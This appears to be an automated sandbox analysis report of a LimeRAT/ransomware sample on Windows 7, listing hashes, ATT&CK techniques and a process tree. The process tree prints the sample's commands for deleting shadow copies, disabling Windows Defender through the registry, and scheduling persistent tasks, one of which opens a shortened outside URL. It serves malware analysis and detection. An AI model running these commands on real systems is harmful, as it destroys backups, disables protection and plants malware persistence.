limerat | d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

Analysis

max time kernel
96s
max time network
97s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-09-2022 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Size

330KB
MD5

72efeddca26a5d0a789631998394a2bb
SHA1

8d0490107f947cd1e78c89905eede3312bc402ee
SHA256

d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845
SHA512

344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2
SSDEEP

3072:yI/0W1y4RbVFufrbjKYOPwAEoznq1vK7rbKO6oqoO0MCSgZNz:yRky4R0bDDknq1cm70QiN

Score

10^/10

limerat evasion ransomware rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/532-54-0x0000000000BA0000-0x0000000000BF8000-memory.dmp	disable_win_def
behavioral1/files/0x0005000000005804-91.dat	disable_win_def
behavioral1/files/0x0005000000005804-92.dat	disable_win_def
behavioral1/memory/2512-93-0x0000000000C90000-0x0000000000CE8000-memory.dmp	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
2512	TRACERT.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	TRACERT.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1964	2512	WerFault.exe	76

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1788	schtasks.exe
2480	schtasks.exe
2576	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
732	vssadmin.exe
1312	vssadmin.exe
604	vssadmin.exe
1404	vssadmin.exe
664	vssadmin.exe
680	vssadmin.exe
1896	vssadmin.exe
692	vssadmin.exe
540	vssadmin.exe
984	vssadmin.exe
316	vssadmin.exe
1808	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
1296	powershell.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe
2512	TRACERT.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1476	vssvc.exe
Token: SeRestorePrivilege	1476	vssvc.exe
Token: SeAuditPrivilege	1476	vssvc.exe
Token: SeBackupPrivilege	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeSecurityPrivilege	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeBackupPrivilege	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
Token: SeDebugPrivilege	2512	TRACERT.exe
Token: SeDebugPrivilege	2512	TRACERT.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 532 wrote to memory of 1788	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	27
PID 532 wrote to memory of 1788	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	27
PID 532 wrote to memory of 1788	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	27
PID 532 wrote to memory of 1296	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	30
PID 532 wrote to memory of 1296	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	30
PID 532 wrote to memory of 1296	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	30
PID 532 wrote to memory of 1936	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	41
PID 532 wrote to memory of 1936	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	41
PID 532 wrote to memory of 1936	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	41
PID 532 wrote to memory of 1928	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	40
PID 532 wrote to memory of 1928	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	40
PID 532 wrote to memory of 1928	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	40
PID 532 wrote to memory of 1884	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	32
PID 532 wrote to memory of 1884	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	32
PID 532 wrote to memory of 1884	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	32
PID 532 wrote to memory of 1892	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	34
PID 532 wrote to memory of 1892	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	34
PID 532 wrote to memory of 1892	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	34
PID 532 wrote to memory of 1100	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	37
PID 532 wrote to memory of 1100	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	37
PID 532 wrote to memory of 1100	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	37
PID 532 wrote to memory of 944	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	36
PID 532 wrote to memory of 944	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	36
PID 532 wrote to memory of 944	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	36
PID 532 wrote to memory of 2000	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	42
PID 532 wrote to memory of 2000	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	42
PID 532 wrote to memory of 2000	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	42
PID 1928 wrote to memory of 1616	1928	cmd.exe	46
PID 1928 wrote to memory of 1616	1928	cmd.exe	46
PID 1928 wrote to memory of 1616	1928	cmd.exe	46
PID 532 wrote to memory of 512	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	44
PID 532 wrote to memory of 512	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	44
PID 532 wrote to memory of 512	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	44
PID 1936 wrote to memory of 664	1936	cmd.exe	65
PID 1936 wrote to memory of 664	1936	cmd.exe	65
PID 1936 wrote to memory of 664	1936	cmd.exe	65
PID 532 wrote to memory of 1060	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	47
PID 532 wrote to memory of 1060	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	47
PID 532 wrote to memory of 1060	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	47
PID 532 wrote to memory of 1708	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	58
PID 532 wrote to memory of 1708	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	58
PID 532 wrote to memory of 1708	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	58
PID 532 wrote to memory of 1704	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	56
PID 532 wrote to memory of 1704	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	56
PID 532 wrote to memory of 1704	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	56
PID 532 wrote to memory of 1948	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	50
PID 532 wrote to memory of 1948	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	50
PID 532 wrote to memory of 1948	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	50
PID 532 wrote to memory of 980	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	51
PID 532 wrote to memory of 980	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	51
PID 532 wrote to memory of 980	532	HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe	51
PID 2000 wrote to memory of 1312	2000	cmd.exe	61
PID 2000 wrote to memory of 1312	2000	cmd.exe	61
PID 2000 wrote to memory of 1312	2000	cmd.exe	61
PID 1100 wrote to memory of 692	1100	cmd.exe	59
PID 1100 wrote to memory of 692	1100	cmd.exe	59
PID 1100 wrote to memory of 692	1100	cmd.exe	59
PID 944 wrote to memory of 540	944	cmd.exe	60
PID 944 wrote to memory of 540	944	cmd.exe	60
PID 944 wrote to memory of 540	944	cmd.exe	60
PID 1892 wrote to memory of 1404	1892	cmd.exe	64
PID 1892 wrote to memory of 1404	1892	cmd.exe	64
PID 1892 wrote to memory of 1404	1892	cmd.exe	64
PID 512 wrote to memory of 604	512	cmd.exe	63

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:1788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1296
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:1884
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:984
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1404
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:540
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:692
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:1616
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:664
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1312
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:604
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:1060
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:316
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:1948
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1896
- C:\Windows\system32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  PID:980
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:732
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:1704
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:1708
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:680
- C:\Windows\system32\cmd.exe
  cmd /C schtasks /create /f /st "22:45" /sc daily /mo "26" /tn "UPnPHostConfig" /tr "'explorer'http://bit.ly/2rkW7gZ"
  2⤵
  PID:2452
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "22:45" /sc daily /mo "26" /tn "UPnPHostConfig" /tr "'explorer'http://bit.ly/2rkW7gZ"
    3⤵
    - Creates scheduled task(s)
    PID:2480
- C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe
  "C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe"
  2⤵
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2576
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2512 -s 3060
    3⤵
    - Program crash
    PID:1964

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
330KB

MD5
72efeddca26a5d0a789631998394a2bb

SHA1
8d0490107f947cd1e78c89905eede3312bc402ee

SHA256
d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

SHA512
344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe

Filesize
330KB

MD5
72efeddca26a5d0a789631998394a2bb

SHA1
8d0490107f947cd1e78c89905eede3312bc402ee

SHA256
d456bdf29f0f73886178ad1b097a57a4de9b0e5420cc2a8a2746406500889845

SHA512
344549d18f9fe37b0be7bb5610104ed1551f1e2746ce98ed4f990db52f9c9743102861e25865f6dcb0aed392899cdc4679ed29cf9a4c85e3c76737dac61af6d2

Download Submit
C:\Users\Admin\AppData\Roaming\LinkM\TRACERT.exe.lnk

Filesize
1KB

MD5
77c25f2b0fb4f118d5f0d3a6e1a17d39

SHA1
d4e62fb116b2b718bec7d6d7f1bc666b8becc489

SHA256
e8597a9cc390e3881ba8d354189dea6ab569db16f2c81af2526614549304d507

SHA512
74a834e3a73fb7cbdbcc8aae11cd89cbad1075adf7bf3c0a968e2d49c6c535217a1c910eca837af7d19a65d400c8617d07512e80a6dbf2cc46d15d2491343816

Download Submit
memory/532-54-0x0000000000BA0000-0x0000000000BF8000-memory.dmp

Filesize
352KB

Download
memory/1296-61-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/1296-60-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/1296-59-0x000007FEEB270000-0x000007FEEBDCD000-memory.dmp

Filesize
11.4MB

Download
memory/1296-58-0x000007FEEBDD0000-0x000007FEEC7F3000-memory.dmp

Filesize
10.1MB

Download
memory/1296-57-0x000007FEFB751000-0x000007FEFB753000-memory.dmp

Filesize
8KB

Download
memory/2512-93-0x0000000000C90000-0x0000000000CE8000-memory.dmp

Filesize
352KB

Download
memory/2512-97-0x000000001B2C6000-0x000000001B2E5000-memory.dmp

Filesize
124KB

Download
memory/2512-98-0x000000001B306000-0x000000001B30A000-memory.dmp

Filesize
16KB

Download